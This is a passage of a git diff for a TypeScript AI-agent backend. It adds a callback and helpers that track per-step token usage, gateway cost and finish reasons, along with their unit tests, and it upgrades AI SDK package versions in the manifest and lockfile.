+  const actual = await vi.importActual<typeof import("ai")>("ai");
+  return { ...actual, streamText: vi.fn() };
+});
+
+// Avoid pulling in real gateway / fetch surface.
+vi.mock("@ai-sdk/gateway", () => ({
+  gateway: vi.fn((modelId: string) => ({ modelId, __mock: "gateway" })),
+}));
+
+// Minimal stand-in for a streamText result. Every messageMetadata option
+// handed to toUIMessageStream is pushed onto `metadataCalls` for inspection.
+function makeStreamResult(opts?: { metadataCalls?: Array<unknown> }) {
+  const sink = opts?.metadataCalls ?? [];
+  async function* emitParts() {
+    yield { type: "start" };
+    yield { type: "finish" };
+  }
+  const toUIMessageStream = vi.fn((streamOpts: { messageMetadata?: unknown }) => {
+    sink.push(streamOpts.messageMetadata);
+    return emitParts();
+  });
+  return { toUIMessageStream, finishReason: Promise.resolve("stop") };
+}
+
+// In-memory WritableStream that appends every written chunk to `written`.
+function makeWritable() {
+  const written: unknown[] = [];
+  const sink = {
+    write: (chunk: unknown) => void written.push(chunk),
+  };
+  const stream = new WritableStream(sink);
+  return { stream, written };
+}
+
+const baseInput = {
+  messages: [
+    {
+      id: "m1",
+      role: "user" as const,
+      parts: [{ type: "text" as const, text: "hi" }],
+    },
+  ],
+  modelId: "anthropic/claude-haiku-4.5",
+  agentContext: {
+    sandbox: { state: { type: "vercel" }, workingDirectory: "/sandbox/mono" },
+  },
+};
+
+describe("runAgentStep", () => {
+  beforeEach(() => {
+    vi.clearAllMocks();
+  });
+
+  it("wires a messageMetadata callback into toUIMessageStream", async () => {
+    const captured: unknown[] = [];
+    vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never);
+    const { stream } = makeWritable();
+
+    await runAgentStep({ ...baseInput, writable: stream } as never);
+
+    expect(captured).toHaveLength(1);
+    expect(typeof captured[0]).toBe("function");
+  });
+
+  it("the wired callback emits modelId on finish-step parts", async () => {
+    const captured: unknown[] = [];
+    vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never);
+    const { stream } = makeWritable();
+
+    await runAgentStep({ ...baseInput, writable: stream } as never);
+
+    const cb = captured[0] as (args: {
+      part: { type: string; usage?: unknown; finishReason?: string };
+    }) => { modelId?: string } | undefined;
+    const meta = cb({
+      part: {
+        type: "finish-step",
+        usage: { inputTokens: 10, outputTokens: 5 },
+        finishReason: "stop",
+      },
+    });
+    expect(meta).toBeDefined();
+    expect(meta?.modelId).toBe("anthropic/claude-haiku-4.5");
+  });
+
+  it("the wired callback returns undefined for non-finish-step parts", async () => {
+    const captured: unknown[] = [];
+    vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never);
+    const { stream } = makeWritable();
+
+    await runAgentStep({ ...baseInput, writable: stream } as never);
+
+    const cb = captured[0] as (args: { part: { type: string } }) => unknown;
+    expect(cb({ part: { type: "text-delta" } })).toBeUndefined();
+    expect(cb({ part: { type: "start" } })).toBeUndefined();
+  });
+});
diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts
index b487285dc..983bf4d7a 100644
--- a/app/lib/workflows/runAgentStep.ts
+++ b/app/lib/workflows/runAgentStep.ts
@@ -4,6 +4,7 @@ import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions";
 import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const";
 import { buildAgentTools } from "@/lib/agent/buildAgentTools";
 import type { AgentContext, DurableAgentContext } from "@/lib/agent/tools/AgentContext";
+import { buildMessageMetadataCallback } from "@/lib/agent/messageMetadata/buildMessageMetadataCallback";
 
 export type RunAgentStepInput = {
   messages: UIMessage[];
@@ -45,7 +46,7 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe
     hasSandboxState: Boolean(input.agentContext.sandbox?.state),
   });
 
-  const modelMessages = convertToModelMessages(input.messages);
+  const modelMessages = await convertToModelMessages(input.messages);
   const tools = buildAgentTools({ skills: input.agentContext.skills });
   // Construct the model here (not in the workflow input) — LanguageModel
   // instances aren't JSON-serializable and can't ride durable inputs.
@@ -69,7 +70,12 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe
   // doesn't leak the lock.
   const writer = input.writable.getWriter();
   try {
-    for await (const part of result.toUIMessageStream()) {
+    // `messageMetadata` emits {modelId, usage, cost} chunks the UI
+    // renders as model/cost badges. Mirrors open-agents' chat workflow
+    // shape so sandbox.recoupable.com sees the same metadata when cut
+    // over to api's /api/chat/workflow.
+    const messageMetadata = buildMessageMetadataCallback({ modelId: input.modelId });
+    for await (const part of result.toUIMessageStream({ messageMetadata })) {
       await writer.write(part);
     }
   } finally {
diff --git a/lib/agent/messageMetadata/AgentMessageMetadata.ts b/lib/agent/messageMetadata/AgentMessageMetadata.ts
new file mode 100644
index 000000000..df306c057
--- /dev/null
+++ b/lib/agent/messageMetadata/AgentMessageMetadata.ts
@@ -0,0 +1,29 @@
+import type { FinishReason, LanguageModelUsage } from "ai";
+import type { AgentStepFinishMetadata } from "@/lib/agent/messageMetadata/AgentStepFinishMetadata";
+
+/**
+ * Metadata emitted on each assistant turn via the `messageMetadata`
+ * callback in `runAgentStep`. Mirrors open-agents' `WebAgentMessageMetadata`
+ * (`apps/web/app/types.ts`) byte-for-byte so the sandbox.recoupable.com UI
+ * can render its badges; `ai@^6.0.190`'s `LanguageModelUsage` is used as-is.
+ */
+export type AgentMessageMetadata = {
+  /** Model the client requested (e.g. user selection in the UI). */
+  selectedModelId?: string;
+  /** Model actually used for the call (may differ from selected under gateway fallback). */
+  modelId?: string;
+  /** Usage from the most recent `finish-step`. */
+  lastStepUsage?: LanguageModelUsage;
+  /** Cumulative usage across every step in this message. */
+  totalMessageUsage?: LanguageModelUsage;
+  /** Gateway-reported cost of the most recent step, in USD. */
+  lastStepCost?: number;
+  /** Cumulative gateway-reported cost across every step of the message, in USD. */
+  totalMessageCost?: number;
+  /** Finish reason of the most recent `finish-step`. */
+  lastStepFinishReason?: FinishReason;
+  /** Raw finish reason for that step — presumably the provider's string; TODO confirm. */
+  lastStepRawFinishReason?: string;
+  /** One entry per `finish-step` seen so far, in arrival order. */
+  stepFinishReasons?: AgentStepFinishMetadata[];
+};
diff --git a/lib/agent/messageMetadata/AgentStepFinishMetadata.ts b/lib/agent/messageMetadata/AgentStepFinishMetadata.ts
new file mode 100644
index 000000000..4bc618cbd
--- /dev/null
+++ b/lib/agent/messageMetadata/AgentStepFinishMetadata.ts
@@ -0,0 +1,11 @@
+import type { FinishReason } from "ai";
+
+/**
+ * Per-finish-step record kept on the assistant message so the UI can
+ * render a finish-reason history. Mirrors open-agents'
+ * `WebAgentStepFinishMetadata` in `apps/web/app/types.ts`.
+ */
+export type AgentStepFinishMetadata = {
+  finishReason: FinishReason; // the AI SDK's `FinishReason` value for the step
+  rawFinishReason?: string; // presumably the provider's own reason string — TODO confirm
+};
diff --git a/lib/agent/messageMetadata/GatewayProviderMetadata.ts b/lib/agent/messageMetadata/GatewayProviderMetadata.ts
new file mode 100644
index 000000000..0c10c954a
--- /dev/null
+++ b/lib/agent/messageMetadata/GatewayProviderMetadata.ts
@@ -0,0 +1,18 @@
+/**
+ * Shape of the Vercel AI Gateway entry in `providerMetadata`.
+ * Mirrors open-agents' `apps/web/app/workflows/gateway-metadata.ts`.
+ *
+ * The gateway surfaces per-step cost information alongside routing
+ * diagnostics. We only consume the `cost` field; other fields are
+ * documented for reference and forward-compat.
+ */
+export interface GatewayProviderMetadata {
+  gateway: {
+    cost?: string; // numeric string (e.g. "0.0420"); parsed by extractGatewayCost
+    marketCost?: string;
+    inferenceCost?: string;
+    inputInferenceCost?: string;
+    outputInferenceCost?: string;
+    generationId?: string;
+  };
+}
diff --git a/lib/agent/messageMetadata/__tests__/addLanguageModelUsage.test.ts b/lib/agent/messageMetadata/__tests__/addLanguageModelUsage.test.ts
new file mode 100644
index 000000000..4ba0b0234
--- /dev/null
+++ b/lib/agent/messageMetadata/__tests__/addLanguageModelUsage.test.ts
@@ -0,0 +1,49 @@
+import { describe, it, expect } from "vitest";
+import { addLanguageModelUsage } from "@/lib/agent/messageMetadata/addLanguageModelUsage";
+
+describe("addLanguageModelUsage", () => {
+  it("sums basic input/output/total tokens", () => {
+    const result = addLanguageModelUsage(
+      { inputTokens: 100, outputTokens: 50, totalTokens: 150 },
+      { inputTokens: 200, outputTokens: 75, totalTokens: 275 },
+    );
+    expect(result.inputTokens).toBe(300);
+    expect(result.outputTokens).toBe(125);
+    expect(result.totalTokens).toBe(425);
+  });
+
+  it("sums nested cache token details", () => {
+    const result = addLanguageModelUsage(
+      {
+        inputTokens: 100,
+        outputTokens: 50,
+        inputTokenDetails: { cacheReadTokens: 10, cacheWriteTokens: 5, noCacheTokens: 85 },
+      } as never,
+      {
+        inputTokens: 200,
+        outputTokens: 75,
+        inputTokenDetails: { cacheReadTokens: 20, cacheWriteTokens: 15, noCacheTokens: 165 },
+      } as never,
+    );
+    expect(result.inputTokenDetails?.cacheReadTokens).toBe(30);
+    expect(result.inputTokenDetails?.cacheWriteTokens).toBe(20);
+    expect(result.inputTokenDetails?.noCacheTokens).toBe(250);
+  });
+
+  it("returns undefined for fields missing on both inputs", () => {
+    const result = addLanguageModelUsage(
+      { inputTokens: 100 } as never,
+      { inputTokens: 200 } as never,
+    );
+    expect(result.outputTokens).toBeUndefined();
+    expect(result.totalTokens).toBeUndefined();
+  });
+
+  it("treats missing field on one side as 0", () => {
+    const result = addLanguageModelUsage(
+      { inputTokens: 100, outputTokens: 50 } as never,
+      { inputTokens: 200 } as never,
+    );
+    expect(result.outputTokens).toBe(50);
+  });
+});
diff --git a/lib/agent/messageMetadata/__tests__/addTokenCounts.test.ts b/lib/agent/messageMetadata/__tests__/addTokenCounts.test.ts
new file mode 100644
index 000000000..b0c449c0c
--- /dev/null
+++ b/lib/agent/messageMetadata/__tests__/addTokenCounts.test.ts
@@ -0,0 +1,27 @@
+import { describe, it, expect } from "vitest";
+import { addTokenCounts } from "@/lib/agent/messageMetadata/addTokenCounts";
+
+describe("addTokenCounts", () => {
+  it("returns undefined when both inputs are undefined", () => {
+    expect(addTokenCounts(undefined, undefined)).toBeUndefined();
+  });
+
+  it("returns undefined when both inputs are null", () => {
+    expect(addTokenCounts(null as never, null as never)).toBeUndefined();
+  });
+
+  it("sums two numbers", () => {
+    expect(addTokenCounts(100, 50)).toBe(150);
+  });
+
+  it("treats undefined on one side as 0", () => {
+    expect(addTokenCounts(100, undefined)).toBe(100);
+    expect(addTokenCounts(undefined, 50)).toBe(50);
+  });
+
+  it("handles zero correctly (not confused with undefined)", () => {
+    expect(addTokenCounts(0, 50)).toBe(50);
+    expect(addTokenCounts(0, 0)).toBe(0);
+    expect(addTokenCounts(0, undefined)).toBe(0);
+  });
+});
diff --git a/lib/agent/messageMetadata/__tests__/buildMessageMetadataCallback.test.ts b/lib/agent/messageMetadata/__tests__/buildMessageMetadataCallback.test.ts
new file mode 100644
index 000000000..7afd14e00
--- /dev/null
+++ b/lib/agent/messageMetadata/__tests__/buildMessageMetadataCallback.test.ts
@@ -0,0 +1,93 @@
+import { describe, it, expect } from "vitest";
+import { buildMessageMetadataCallback } from "@/lib/agent/messageMetadata/buildMessageMetadataCallback";
+
+const MODEL_ID = "anthropic/claude-haiku-4.5";
+
+// `ai@^6.0.190` uses the flat LanguageModelUsage shape — same as the
+// open-agents UI consumes — so the callback passes usage through
+// without any shape conversion.
+function finishStepPart(opts: {
+  inputTokens?: number;
+  outputTokens?: number;
+  cost?: string;
+  finishReason?: string;
+}) {
+  const inputTokens = opts.inputTokens ?? 100;
+  const outputTokens = opts.outputTokens ?? 50;
+  return {
+    type: "finish-step",
+    usage: {
+      inputTokens,
+      outputTokens,
+      totalTokens: inputTokens + outputTokens,
+      inputTokenDetails: {
+        noCacheTokens: inputTokens,
+        cacheReadTokens: undefined,
+        cacheWriteTokens: undefined,
+      },
+      outputTokenDetails: {
+        textTokens: outputTokens,
+        reasoningTokens: undefined,
+      },
+    },
+    providerMetadata: opts.cost ? { gateway: { cost: opts.cost } } : undefined,
+    finishReason: opts.finishReason ?? "tool-calls",
+  } as never;
+}
+
+describe("buildMessageMetadataCallback", () => {
+  it("returns undefined for non-finish-step parts (start, text-delta, tool-call, etc.)", () => {
+    const cb = buildMessageMetadataCallback({ modelId: MODEL_ID });
+    expect(cb({ part: { type: "text-delta", delta: "hi" } as never })).toBeUndefined();
+    expect(cb({ part: { type: "start" } as never })).toBeUndefined();
+    expect(cb({ part: { type: "tool-call", toolName: "bash" } as never })).toBeUndefined();
+  });
+
+  it("emits modelId + selectedModelId + usage on the first finish-step", () => {
+    const cb = buildMessageMetadataCallback({ modelId: MODEL_ID });
+    const meta = cb({ part: finishStepPart({ inputTokens: 100, outputTokens: 50 }) });
+    expect(meta).toMatchObject({
+      modelId: MODEL_ID,
+      selectedModelId: MODEL_ID,
+      lastStepUsage: { inputTokens: 100, outputTokens: 50 },
+      totalMessageUsage: { inputTokens: 100, outputTokens: 50 },
+    });
+  });
+
+  it("emits cost when the gateway provider metadata includes it", () => {
+    const cb = buildMessageMetadataCallback({ modelId: MODEL_ID });
+    const meta = cb({ part: finishStepPart({ cost: "0.025" }) });
+    expect(meta).toMatchObject({ lastStepCost: 0.025, totalMessageCost: 0.025 });
+  });
+
+  it("omits cost fields when the gateway did not report one", () => {
+    const cb = buildMessageMetadataCallback({ modelId: MODEL_ID });
+    const meta = cb({ part: finishStepPart({}) }) as Record<string, unknown>;
+    expect(meta.lastStepCost).toBeUndefined();
+    expect(meta.totalMessageCost).toBeUndefined();
+  });
+
+  it("accumulates usage AND cost across multiple finish-step calls", () => {
+    const cb = buildMessageMetadataCallback({ modelId: MODEL_ID });
+    cb({ part: finishStepPart({ inputTokens: 100, outputTokens: 50, cost: "0.01" }) });
+    const meta = cb({
+      part: finishStepPart({ inputTokens: 200, outputTokens: 75, cost: "0.03" }),
+    });
+    expect(meta).toMatchObject({
+      lastStepUsage: { inputTokens: 200, outputTokens: 75 },
+      totalMessageUsage: { inputTokens: 300, outputTokens: 125 },
+      lastStepCost: 0.03,
+      totalMessageCost: 0.04,
+    });
+  });
+
+  it("records lastStepFinishReason and stepFinishReasons history", () => {
+    const cb = buildMessageMetadataCallback({ modelId: MODEL_ID });
+    cb({ part: finishStepPart({ finishReason: "tool-calls" }) });
+    const meta = cb({ part: finishStepPart({ finishReason: "stop" }) });
+    expect(meta).toMatchObject({
+      lastStepFinishReason: "stop",
+      stepFinishReasons: [{ finishReason: "tool-calls" }, { finishReason: "stop" }],
+    });
+  });
+});
diff --git a/lib/agent/messageMetadata/__tests__/extractGatewayCost.test.ts b/lib/agent/messageMetadata/__tests__/extractGatewayCost.test.ts
new file mode 100644
index 000000000..d1c678914
--- /dev/null
+++ b/lib/agent/messageMetadata/__tests__/extractGatewayCost.test.ts
@@ -0,0 +1,28 @@
+import { describe, it, expect } from "vitest";
+import { extractGatewayCost } from "@/lib/agent/messageMetadata/extractGatewayCost";
+
+describe("extractGatewayCost", () => {
+  it("returns undefined when providerMetadata is missing", () => {
+    expect(extractGatewayCost(undefined)).toBeUndefined();
+  });
+
+  it("returns undefined when there is no `gateway` namespace", () => {
+    expect(extractGatewayCost({ openai: { foo: "bar" } } as never)).toBeUndefined();
+  });
+
+  it("returns undefined when `gateway.cost` is missing", () => {
+    expect(extractGatewayCost({ gateway: {} } as never)).toBeUndefined();
+  });
+
+  it("parses a numeric string cost", () => {
+    expect(extractGatewayCost({ gateway: { cost: "0.0420" } } as never)).toBe(0.042);
+  });
+
+  it("returns undefined when cost is non-numeric", () => {
+    expect(extractGatewayCost({ gateway: { cost: "not-a-number" } } as never)).toBeUndefined();
+  });
+
+  it("returns undefined when cost is a number (gateway should send strings)", () => {
+    expect(extractGatewayCost({ gateway: { cost: 0.05 } } as never)).toBeUndefined();
+  });
+});
diff --git a/lib/agent/messageMetadata/__tests__/hasGatewayShape.test.ts b/lib/agent/messageMetadata/__tests__/hasGatewayShape.test.ts
new file mode 100644
index 000000000..c2c24f64f
--- /dev/null
+++ b/lib/agent/messageMetadata/__tests__/hasGatewayShape.test.ts
@@ -0,0 +1,25 @@
+import { describe, it, expect } from "vitest";
+import { hasGatewayShape } from "@/lib/agent/messageMetadata/hasGatewayShape";
+
+describe("hasGatewayShape", () => {
+  it("returns false for undefined metadata", () => {
+    expect(hasGatewayShape(undefined)).toBe(false);
+  });
+
+  it("returns false when there is no `gateway` namespace", () => {
+    expect(hasGatewayShape({ openai: { foo: "bar" } } as never)).toBe(false);
+  });
+
+  it("returns false when `gateway` is null", () => {
+    expect(hasGatewayShape({ gateway: null } as never)).toBe(false);
+  });
+
+  it("returns false when `gateway` is a string (not an object)", () => {
+    expect(hasGatewayShape({ gateway: "oops" } as never)).toBe(false);
+  });
+
+  it("returns true when `gateway` is an object (even empty)", () => {
+    expect(hasGatewayShape({ gateway: {} } as never)).toBe(true);
+    expect(hasGatewayShape({ gateway: { cost: "0.05" } } as never)).toBe(true);
+  });
+});
diff --git a/lib/agent/messageMetadata/addLanguageModelUsage.ts b/lib/agent/messageMetadata/addLanguageModelUsage.ts
new file mode 100644
index 000000000..4a676364f
--- /dev/null
+++ b/lib/agent/messageMetadata/addLanguageModelUsage.ts
@@ -0,0 +1,49 @@
+import type { LanguageModelUsage } from "ai";
+import { addTokenCounts } from "@/lib/agent/messageMetadata/addTokenCounts";
+
+/**
+ * Pointwise-sum two `LanguageModelUsage` records (the flat shape used by
+ * `ai@^6.0.190`). Mirrors `packages/agent/usage.ts:addLanguageModelUsage`
+ * in the open-agents source. Used to accumulate per-step usage into a
+ * per-message total inside the `messageMetadata` callback.
+ *
+ * Each counter is `undefined` only when it is missing on BOTH inputs, so
+ * no spurious zeros appear. `inputTokenDetails` / `outputTokenDetails`
+ * are always emitted as objects (their counters may all be `undefined`).
+ */
+export function addLanguageModelUsage(
+  a: LanguageModelUsage,
+  b: LanguageModelUsage,
+): LanguageModelUsage {
+  return {
+    inputTokens: addTokenCounts(a.inputTokens, b.inputTokens),
+    inputTokenDetails: {
+      noCacheTokens: addTokenCounts(
+        a.inputTokenDetails?.noCacheTokens,
+        b.inputTokenDetails?.noCacheTokens,
+      ),
+      cacheReadTokens: addTokenCounts(
+        a.inputTokenDetails?.cacheReadTokens,
+        b.inputTokenDetails?.cacheReadTokens,
+      ),
+      cacheWriteTokens: addTokenCounts(
+        a.inputTokenDetails?.cacheWriteTokens,
+        b.inputTokenDetails?.cacheWriteTokens,
+      ),
+    },
+    outputTokens: addTokenCounts(a.outputTokens, b.outputTokens),
+    outputTokenDetails: {
+      textTokens: addTokenCounts(
+        a.outputTokenDetails?.textTokens,
+        b.outputTokenDetails?.textTokens,
+      ),
+      reasoningTokens: addTokenCounts(
+        a.outputTokenDetails?.reasoningTokens,
+        b.outputTokenDetails?.reasoningTokens,
+      ),
+    },
+    totalTokens: addTokenCounts(a.totalTokens, b.totalTokens),
+    reasoningTokens: addTokenCounts(a.reasoningTokens, b.reasoningTokens),
+    cachedInputTokens: addTokenCounts(a.cachedInputTokens, b.cachedInputTokens),
+  };
+}
diff --git a/lib/agent/messageMetadata/addTokenCounts.ts b/lib/agent/messageMetadata/addTokenCounts.ts
new file mode 100644
index 000000000..354a79f32
--- /dev/null
+++ b/lib/agent/messageMetadata/addTokenCounts.ts
@@ -0,0 +1,13 @@
+/**
+ * Pointwise-sum two `number | undefined` token counts. Returns
+ * `undefined` only when BOTH inputs are missing; when exactly one is
+ * missing it counts as 0, so the other value is returned unchanged.
+ * Keeps sparse usage records sparse instead of adding spurious zeros.
+ *
+ * Mirrors open-agents' internal `addTokenCounts` helper inside
+ * `packages/agent/usage.ts`.
+ */
+export function addTokenCounts(a: number | undefined, b: number | undefined): number | undefined {
+  if (a == null && b == null) return undefined;
+  return (a ?? 0) + (b ?? 0);
+}
diff --git a/lib/agent/messageMetadata/buildMessageMetadataCallback.ts b/lib/agent/messageMetadata/buildMessageMetadataCallback.ts
new file mode 100644
index 000000000..07225fd6a
--- /dev/null
+++ b/lib/agent/messageMetadata/buildMessageMetadataCallback.ts
@@ -0,0 +1,81 @@
+import type { LanguageModelUsage, TextStreamPart, ToolSet } from "ai";
+import { addLanguageModelUsage } from "@/lib/agent/messageMetadata/addLanguageModelUsage";
+import { extractGatewayCost } from "@/lib/agent/messageMetadata/extractGatewayCost";
+import type { AgentMessageMetadata } from "@/lib/agent/messageMetadata/AgentMessageMetadata";
+import type { AgentStepFinishMetadata } from "@/lib/agent/messageMetadata/AgentStepFinishMetadata";
+
+/**
+ * Build a stateful `messageMetadata` callback for `toUIMessageStream`.
+ * Accumulates per-step usage, cost, and finish reasons across an
+ * assistant turn and emits the running totals on every `finish-step`
+ * part. Any other part type returns `undefined` (AI SDK skips emission).
+ *
+ * Mirrors open-agents' `apps/web/app/workflows/chat.ts` callback shape
+ * so sandbox.recoupable.com's UI can render model/cost/usage badges
+ * when cut over to api's `/api/chat/workflow`. api and open-agents now
+ * share the same `ai@^6.0.190` shape for `LanguageModelUsage`, so no
+ * shape conversion happens here.
+ *
+ * Each call returns a FRESH closure with its own accumulators, so build
+ * one per assistant turn; `opts.modelId` is echoed on every emission.
+ */
+export function buildMessageMetadataCallback(opts: { modelId: string }) {
+  let lastStepUsage: LanguageModelUsage | undefined;
+  let totalMessageUsage: LanguageModelUsage | undefined;
+  let lastStepCost: number | undefined;
+  let totalMessageCost: number | undefined;
+  let stepFinishReasons: AgentStepFinishMetadata[] = [];
+
+  return function messageMetadata({
+    part,
+  }: {
+    part: TextStreamPart<ToolSet>;
+  }): AgentMessageMetadata | undefined {
+    if (part.type !== "finish-step") return undefined;
+
+    const finishPart = part as TextStreamPart<ToolSet> & {
+      usage?: LanguageModelUsage;
+      providerMetadata?: Parameters<typeof extractGatewayCost>[0];
+      finishReason?: AgentStepFinishMetadata["finishReason"];
+      rawFinishReason?: string;
+    };
+
+    if (finishPart.usage) {
+      lastStepUsage = finishPart.usage;
+      totalMessageUsage = totalMessageUsage
+        ? addLanguageModelUsage(totalMessageUsage, finishPart.usage)
+        : finishPart.usage;
+    }
+
+    const stepCost = extractGatewayCost(finishPart.providerMetadata);
+    if (stepCost !== undefined) {
+      lastStepCost = stepCost;
+      totalMessageCost = (totalMessageCost ?? 0) + stepCost;
+    }
+
+    if (finishPart.finishReason) {
+      stepFinishReasons = [
+        ...stepFinishReasons,
+        {
+          finishReason: finishPart.finishReason,
+          rawFinishReason: finishPart.rawFinishReason,
+        },
+      ];
+    }
+
+    return {
+      // `selectedModelId` and `modelId` are equal in api today (no
+      // gateway fallback routing exposed) — emit both for shape
+      // parity with open-agents' WebAgentMessageMetadata.
+      selectedModelId: opts.modelId,
+      modelId: opts.modelId,
+      lastStepUsage,
+      totalMessageUsage,
+      lastStepCost,
+      totalMessageCost,
+      lastStepFinishReason: finishPart.finishReason,
+      lastStepRawFinishReason: finishPart.rawFinishReason,
+      stepFinishReasons,
+    };
+  };
+}
diff --git a/lib/agent/messageMetadata/extractGatewayCost.ts b/lib/agent/messageMetadata/extractGatewayCost.ts
new file mode 100644
index 000000000..42ef13f63
--- /dev/null
+++ b/lib/agent/messageMetadata/extractGatewayCost.ts
@@ -0,0 +1,20 @@
+import type { ProviderMetadata } from "ai";
+import { hasGatewayShape } from "@/lib/agent/messageMetadata/hasGatewayShape";
+
+/**
+ * Extract the gateway-reported cost for a single step. Returns
+ * `undefined` when there is no `gateway` entry, when `gateway.cost` is
+ * not a string, or when it does not parse to a finite number. Parsing
+ * uses `Number.parseFloat`, so a numeric prefix such as "1.5x" is accepted.
+ *
+ * Mirrors open-agents' `apps/web/app/workflows/gateway-metadata.ts`.
+ */
+export function extractGatewayCost(
+  providerMetadata: ProviderMetadata | undefined,
+): number | undefined {
+  if (!hasGatewayShape(providerMetadata)) return undefined;
+  const rawCost = providerMetadata.gateway.cost;
+  if (typeof rawCost !== "string") return undefined;
+  const cost = Number.parseFloat(rawCost);
+  return Number.isFinite(cost) ? cost : undefined;
+}
diff --git a/lib/agent/messageMetadata/hasGatewayShape.ts b/lib/agent/messageMetadata/hasGatewayShape.ts
new file mode 100644
index 000000000..db322c8e7
--- /dev/null
+++ b/lib/agent/messageMetadata/hasGatewayShape.ts
@@ -0,0 +1,18 @@
+import type { ProviderMetadata } from "ai";
+import type { GatewayProviderMetadata } from "@/lib/agent/messageMetadata/GatewayProviderMetadata";
+
+/**
+ * Type guard for the Vercel AI Gateway entry inside a step's
+ * `providerMetadata`. Returns true when `metadata.gateway` is a non-null
+ * value of type "object" (arrays included); `cost` is not inspected.
+ * Kept separate from `extractGatewayCost` so each file has a single
+ * responsibility and the guard can be reused when other gateway fields
+ * (e.g. `inferenceCost`) get plumbed through later.
+ */
+export function hasGatewayShape(
+  metadata: ProviderMetadata | undefined,
+): metadata is ProviderMetadata & GatewayProviderMetadata {
+  if (!metadata) return false;
+  const gateway = (metadata as Record<string, unknown>).gateway;
+  return typeof gateway === "object" && gateway !== null;
+}
diff --git a/lib/chat/setupChatRequest.ts b/lib/chat/setupChatRequest.ts
index f88654de3..949ca29cb 100644
--- a/lib/chat/setupChatRequest.ts
+++ b/lib/chat/setupChatRequest.ts
@@ -18,10 +18,12 @@ import getGeneralAgent from "@/lib/agents/generalAgent/getGeneralAgent";
 export async function setupChatRequest(body: ChatRequestBody): Promise<ChatConfig> {
   const decision = await getGeneralAgent(body);
 
-  const convertedMessages = convertToModelMessages(body.messages, {
-    tools: decision.agent.tools,
-    ignoreIncompleteToolCalls: true,
-  }).slice(-MAX_MESSAGES);
+  const convertedMessages = (
+    await convertToModelMessages(body.messages, {
+      tools: decision.agent.tools,
+      ignoreIncompleteToolCalls: true,
+    })
+  ).slice(-MAX_MESSAGES);
 
   return {
     agent: decision.agent,
diff --git a/package.json b/package.json
index 4b5a23bc0..f2d1ba03a 100644
--- a/package.json
+++ b/package.json
@@ -17,11 +17,11 @@
     "eval": "braintrust eval --external-packages playwright playwright-core chromium-bidi @browserbasehq/stagehand @composio/core @composio/vercel"
   },
   "dependencies": {
-    "@ai-sdk/anthropic": "^3.0.13",
-    "@ai-sdk/gateway": "2.0.83",
-    "@ai-sdk/google": "^3.0.8",
-    "@ai-sdk/mcp": "^0.0.12",
-    "@ai-sdk/openai": "^3.0.10",
+    "@ai-sdk/anthropic": "^3.0.78",
+    "@ai-sdk/gateway": "3.0.119",
+    "@ai-sdk/google": "^3.0.79",
+    "@ai-sdk/mcp": "^1.0.43",
+    "@ai-sdk/openai": "^3.0.65",
     "@chat-adapter/github": "^4.15.0",
     "@chat-adapter/slack": "^4.15.0",
     "@chat-adapter/state-ioredis": "^4.15.0",
@@ -37,7 +37,7 @@
     "@trigger.dev/sdk": "^4.4.3",
     "@vercel/blob": "^2.3.1",
     "@vercel/sandbox": "2.0.0-beta.11",
-    "ai": "6.0.0-beta.122",
+    "ai": "6.0.190",
     "apify-client": "^2.20.0",
     "arweave": "^1.15.7",
     "autoevals": "^0.0.129",
diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
index eee3c93c9..7b4a331ad 100644
--- a/pnpm-lock.yaml
+++ b/pnpm-lock.yaml
@@ -9,20 +9,20 @@ importers:
   .:
     dependencies:
       '@ai-sdk/anthropic':
-        specifier: ^3.0.13
-        version: 3.0.13(zod@4.1.13)
+        specifier: ^3.0.78
+        version: 3.0.78(zod@4.1.13)
       '@ai-sdk/gateway':
-        specifier: 2.0.83
-        version: 2.0.83(zod@4.1.13)
+        specifier: 3.0.119
+        version: 3.0.119(zod@4.1.13)
       '@ai-sdk/google':
-        specifier: ^3.0.8
-        version: 3.0.8(zod@4.1.13)
+        specifier: ^3.0.79
+        version: 3.0.79(zod@4.1.13)
       '@ai-sdk/mcp':
-        specifier: ^0.0.12
-        version: 0.0.12(zod@4.1.13)
+        specifier: ^1.0.43
+        version: 1.0.43(zod@4.1.13)
       '@ai-sdk/openai':
-        specifier: ^3.0.10
-        version: 3.0.10(zod@4.1.13)
+        specifier: ^3.0.65
+        version: 3.0.65(zod@4.1.13)
       '@chat-adapter/github':
         specifier: ^4.15.0
         version: 4.15.0
@@ -46,7 +46,7 @@ importers:
         version: 0.3.4(ws@8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10))(zod@4.1.13)
       '@composio/vercel':
         specifier: ^0.3.4
-        version: 0.3.4(@composio/core@0.3.4(ws@8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10))(zod@4.1.13))(ai@6.0.0-beta.122(zod@4.1.13))
+        version: 0.3.4(@composio/core@0.3.4(ws@8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10))(zod@4.1.13))(ai@6.0.190(zod@4.1.13))
       '@fal-ai/client':
         specifier: ^1.9.5
         version: 1.9.5
@@ -61,7 +61,7 @@ importers:
         version: 2.86.0(bufferutil@4.0.9)(utf-8-validate@5.0.10)
       '@trigger.dev/sdk':
         specifier: ^4.4.3
-        version: 4.4.3(ai@6.0.0-beta.122(zod@4.1.13))(bufferutil@4.0.9)(utf-8-validate@5.0.10)(zod@4.1.13)
+        version: 4.4.3(ai@6.0.190(zod@4.1.13))(bufferutil@4.0.9)(utf-8-validate@5.0.10)(zod@4.1.13)
       '@vercel/blob':
         specifier: ^2.3.1
         version: 2.3.1
@@ -69,8 +69,8 @@ importers:
         specifier: 2.0.0-beta.11
         version: 2.0.0-beta.11
       ai:
-        specifier: 6.0.0-beta.122
-        version: 6.0.0-beta.122(zod@4.1.13)
+        specifier: 6.0.190
+        version: 6.0.190(zod@4.1.13)
       apify-client:
         specifier: ^2.20.0
         version: 2.20.0
@@ -204,72 +204,38 @@ packages:
   '@adraffy/ens-normalize@1.11.1':
